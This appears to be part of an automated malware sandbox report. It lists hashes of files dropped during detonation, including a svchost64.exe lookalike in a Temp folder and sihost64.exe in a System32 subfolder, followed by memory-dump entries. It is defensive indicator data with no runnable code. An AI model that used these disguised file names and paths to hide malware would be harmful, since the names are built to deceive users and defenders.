1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6a3caaa4-d938-4060-881c-db29260884dc
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6e6971b7-28ba-4f29-9b98-9ddb71dbd5d8
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cc860e47-960e-4af3-82aa-fe17706f80ef
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f17f6e9e-4a25-4e3f-b1d1-3bb9ba562e1c
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
2883e82bba9abc92e662cae4d56f7d15

SHA1
41253bb93509bbd44c012a3d64b25bc4744dec60

SHA256
dcc9d4734b88574ad7deb769766e22e73a944b120da6d9ee775c4b5ce304ad4a

SHA512
8a8b3417f08f349ac68ed63f05cc1d55a3302eaa71a2bf7da72b52e82b0141f194b580640f8597e193f7eda6d546bb8028059aa212845a0ed1bf4f7680f33f78

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
b97dba5ec3906d3b681efdf92b78a4d7

SHA1
b90192a2281ba8c2f91097e8abdbab4238a1bd84

SHA256
94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

SHA512
ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
b97dba5ec3906d3b681efdf92b78a4d7

SHA1
b90192a2281ba8c2f91097e8abdbab4238a1bd84

SHA256
94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

SHA512
ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
b97dba5ec3906d3b681efdf92b78a4d7

SHA1
b90192a2281ba8c2f91097e8abdbab4238a1bd84

SHA256
94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

SHA512
ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
b97dba5ec3906d3b681efdf92b78a4d7

SHA1
b90192a2281ba8c2f91097e8abdbab4238a1bd84

SHA256
94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

SHA512
ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
530b662d79d9ce226a1a4cdca98d2e43

SHA1
447a37ce77cce9a6304268716ca65763fc0f383e

SHA256
bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

SHA512
d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
57df22c2f179f5d259ba6e3f4c5f6ffe

SHA1
80d74c5f2e55c45e84328faa6be95efec87bf7f5

SHA256
e3ad2c29a9c3c762754afb0737c8e3da4a53a3649f337dae6333e1bd684ab910

SHA512
bd52f815093090964db59d0fd6810c40c01839ca3e14d21c824c971bf53499518355621b12a2fa3bd389eeefb1efb2f5b47a16c5b51ddd8dd015ebebc2232523

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
530b662d79d9ce226a1a4cdca98d2e43

SHA1
447a37ce77cce9a6304268716ca65763fc0f383e

SHA256
bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

SHA512
d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
530b662d79d9ce226a1a4cdca98d2e43

SHA1
447a37ce77cce9a6304268716ca65763fc0f383e

SHA256
bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

SHA512
d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
530b662d79d9ce226a1a4cdca98d2e43

SHA1
447a37ce77cce9a6304268716ca65763fc0f383e

SHA256
bf18a3357fff551d4c96370418c7132e62ad915a1016e4994fdc6d708d08a739

SHA512
d6af7c2d8b16ffa44a111be7f024d97450dffc345e0bcbb3507b89b561d7488230fef84f499640da1a5260d6ec38abfcadebfcbe4942c3587bab4b3cc68bad73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
57df22c2f179f5d259ba6e3f4c5f6ffe

SHA1
80d74c5f2e55c45e84328faa6be95efec87bf7f5

SHA256
e3ad2c29a9c3c762754afb0737c8e3da4a53a3649f337dae6333e1bd684ab910

SHA512
bd52f815093090964db59d0fd6810c40c01839ca3e14d21c824c971bf53499518355621b12a2fa3bd389eeefb1efb2f5b47a16c5b51ddd8dd015ebebc2232523

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
57df22c2f179f5d259ba6e3f4c5f6ffe

SHA1
80d74c5f2e55c45e84328faa6be95efec87bf7f5

SHA256
e3ad2c29a9c3c762754afb0737c8e3da4a53a3649f337dae6333e1bd684ab910

SHA512
bd52f815093090964db59d0fd6810c40c01839ca3e14d21c824c971bf53499518355621b12a2fa3bd389eeefb1efb2f5b47a16c5b51ddd8dd015ebebc2232523

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe
MD5
1a39ac13bc88ad7d21e874535107fe83

SHA1
a0c88f578af5bed2d873eba3a32b0b712b41f4ae

SHA256
25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

SHA512
5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

Download Submit
C:\Windows\System32\splwow64.exe
MD5
cab63b06017beec8efd11d7f03ca5a85

SHA1
4f252e828d51bfe8cf1322e6c18656a8a9b359e2

SHA256
cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

SHA512
9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

Download Submit
C:\Windows\system32\Microsoft\Libs\sihost64.exe
MD5
1a39ac13bc88ad7d21e874535107fe83

SHA1
a0c88f578af5bed2d873eba3a32b0b712b41f4ae

SHA256
25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

SHA512
5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

Download Submit
C:\Windows\system32\splwow64.exe
MD5
cab63b06017beec8efd11d7f03ca5a85

SHA1
4f252e828d51bfe8cf1322e6c18656a8a9b359e2

SHA256
cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

SHA512
9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

Download Submit
\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
b97dba5ec3906d3b681efdf92b78a4d7

SHA1
b90192a2281ba8c2f91097e8abdbab4238a1bd84

SHA256
94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

SHA512
ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

Download Submit
\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
b97dba5ec3906d3b681efdf92b78a4d7

SHA1
b90192a2281ba8c2f91097e8abdbab4238a1bd84

SHA256
94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

SHA512
ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

Download Submit
\Windows\System32\Microsoft\Libs\sihost64.exe
MD5
1a39ac13bc88ad7d21e874535107fe83

SHA1
a0c88f578af5bed2d873eba3a32b0b712b41f4ae

SHA256
25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

SHA512
5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

Download Submit
\Windows\System32\splwow64.exe
MD5
cab63b06017beec8efd11d7f03ca5a85

SHA1
4f252e828d51bfe8cf1322e6c18656a8a9b359e2

SHA256
cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

SHA512
9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

Download Submit
memory/360-140-0x0000000000000000-mapping.dmp

Download
memory/480-137-0x000000013F5E0000-0x000000013F5E1000-memory.dmp

Filesize
4KB

Download
memory/480-149-0x0000000002290000-0x0000000002292000-memory.dmp

Filesize
8KB

Download
memory/480-134-0x0000000000000000-mapping.dmp

Download
memory/560-200-0x0000000000000000-mapping.dmp

Download
memory/592-179-0x0000000000000000-mapping.dmp

Download
memory/840-61-0x0000000000000000-mapping.dmp

Download
memory/864-128-0x000000013F950000-0x000000013F951000-memory.dmp

Filesize
4KB

Download
memory/864-130-0x000000001BAD0000-0x000000001BAD2000-memory.dmp

Filesize
8KB

Download
memory/864-125-0x0000000000000000-mapping.dmp

Download
memory/936-139-0x0000000000000000-mapping.dmp

Download
memory/1052-112-0x000000001AAE0000-0x000000001AAE2000-memory.dmp

Filesize
8KB

Download
memory/1052-113-0x000000001AAE4000-0x000000001AAE6000-memory.dmp

Filesize
8KB

Download
memory/1052-105-0x0000000000000000-mapping.dmp

Download
memory/1080-67-0x000000001BDC0000-0x000000001BDC2000-memory.dmp

Filesize
8KB

Download
memory/1080-59-0x000000013FCB0000-0x000000013FCB1000-memory.dmp

Filesize
4KB

Download
memory/1104-195-0x000000001BE30000-0x000000001BE32000-memory.dmp

Filesize
8KB

Download
memory/1104-188-0x0000000000000000-mapping.dmp

Download
memory/1148-132-0x0000000000000000-mapping.dmp

Download
memory/1172-151-0x000000001AA14000-0x000000001AA16000-memory.dmp

Filesize
8KB

Download
memory/1172-150-0x000000001AA10000-0x000000001AA12000-memory.dmp

Filesize
8KB

Download
memory/1172-142-0x0000000000000000-mapping.dmp

Download
memory/1248-186-0x0000000000000000-mapping.dmp

Download
memory/1300-141-0x0000000000000000-mapping.dmp

Download
memory/1536-131-0x0000000000000000-mapping.dmp

Download
memory/1548-123-0x0000000000000000-mapping.dmp

Download
memory/1572-122-0x000000001A874000-0x000000001A876000-memory.dmp

Filesize
8KB

Download
memory/1572-121-0x000000001A870000-0x000000001A872000-memory.dmp

Filesize
8KB

Download
memory/1572-114-0x0000000000000000-mapping.dmp

Download
memory/1576-189-0x0000000000000000-mapping.dmp

Download
memory/1616-152-0x0000000000000000-mapping.dmp

Download
memory/1616-159-0x000000001ACA4000-0x000000001ACA6000-memory.dmp

Filesize
8KB

Download
memory/1616-158-0x000000001ACA0000-0x000000001ACA2000-memory.dmp

Filesize
8KB

Download
memory/1836-194-0x000000001BD00000-0x000000001BD02000-memory.dmp

Filesize
8KB

Download
memory/1836-181-0x0000000000000000-mapping.dmp

Download
memory/1836-184-0x000000013F8D0000-0x000000013F8D1000-memory.dmp

Filesize
4KB

Download
memory/1908-170-0x0000000000000000-mapping.dmp

Download
memory/1908-175-0x000000001AA80000-0x000000001AA82000-memory.dmp

Filesize
8KB

Download
memory/1908-176-0x000000001AA84000-0x000000001AA86000-memory.dmp

Filesize
8KB

Download
memory/1944-91-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1944-88-0x0000000000000000-mapping.dmp

Download
memory/1944-94-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/1944-93-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1944-92-0x000000001ACB0000-0x000000001ACB1000-memory.dmp

Filesize
4KB

Download
memory/1944-96-0x000000001AC34000-0x000000001AC36000-memory.dmp

Filesize
8KB

Download
memory/1944-95-0x000000001AC30000-0x000000001AC32000-memory.dmp

Filesize
8KB

Download
memory/1976-87-0x0000000002800000-0x0000000002801000-memory.dmp

Filesize
4KB

Download
memory/1976-62-0x0000000000000000-mapping.dmp

Download
memory/1976-74-0x000000001AAD0000-0x000000001AAD1000-memory.dmp

Filesize
4KB

Download
memory/1976-70-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1976-69-0x000000001AB34000-0x000000001AB36000-memory.dmp

Filesize
8KB

Download
memory/1976-86-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download
memory/1976-204-0x0000000000480000-0x00000000004A0000-memory.dmp

Filesize
128KB

Download
memory/1976-68-0x000000001AB30000-0x000000001AB32000-memory.dmp

Filesize
8KB

Download
memory/1976-66-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/1976-203-0x0000000000350000-0x0000000000370000-memory.dmp

Filesize
128KB

Download
memory/1976-65-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

Filesize
4KB

Download
memory/1976-64-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/1976-63-0x000007FEFC221000-0x000007FEFC223000-memory.dmp

Filesize
8KB

Download
memory/1976-202-0x0000000000350000-0x0000000000370000-memory.dmp

Filesize
128KB

Download
memory/1976-197-0x00000001402EB66C-mapping.dmp

Download
memory/1976-201-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1976-71-0x000000001A920000-0x000000001A921000-memory.dmp

Filesize
4KB

Download
memory/2028-199-0x0000000000000000-mapping.dmp

Download
memory/2040-161-0x0000000000000000-mapping.dmp

Download
memory/2040-168-0x000000001AC34000-0x000000001AC36000-memory.dmp

Filesize
8KB

Download
memory/2040-167-0x000000001AC30000-0x000000001AC32000-memory.dmp

Filesize
8KB

Download